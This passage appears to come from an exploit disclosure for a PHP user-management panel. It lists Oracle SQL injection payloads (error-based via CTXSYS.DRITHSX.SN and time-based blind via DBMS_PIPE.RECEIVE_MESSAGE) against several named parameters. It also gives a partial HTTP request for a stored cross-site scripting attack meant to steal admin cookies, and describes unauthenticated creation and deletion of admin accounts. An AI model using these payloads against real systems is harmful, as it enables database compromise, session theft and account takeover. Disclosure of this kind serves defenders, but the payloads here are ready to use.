Type: Error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND
1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT
(CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM
DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))--
DhDH&k_yetki_duz=USER&kullanici_duzenle=
Type: Time-based blind
Title: Oracle AND time-based blind
Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND
6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)--
VuHD&k_yetki_duz=USER&kullanici_duzenle=
k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle=
Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and
k_sifre_duz parameters are injectable/vulnerable.
Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User
Management Panel
=======================================================================================
Description : An attacker can stole an admin’s cookie.
POST /TARGET_PATH/netting/islem2.php HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Vulnerability #3: Unauthenticated Creating Admin User
======================================================
Description : An attacker can create an admin or normal account.
Vulnerability #4: Unauthenticated Deleting User
=============================================
Description : An attacker can delete an admin or normal account.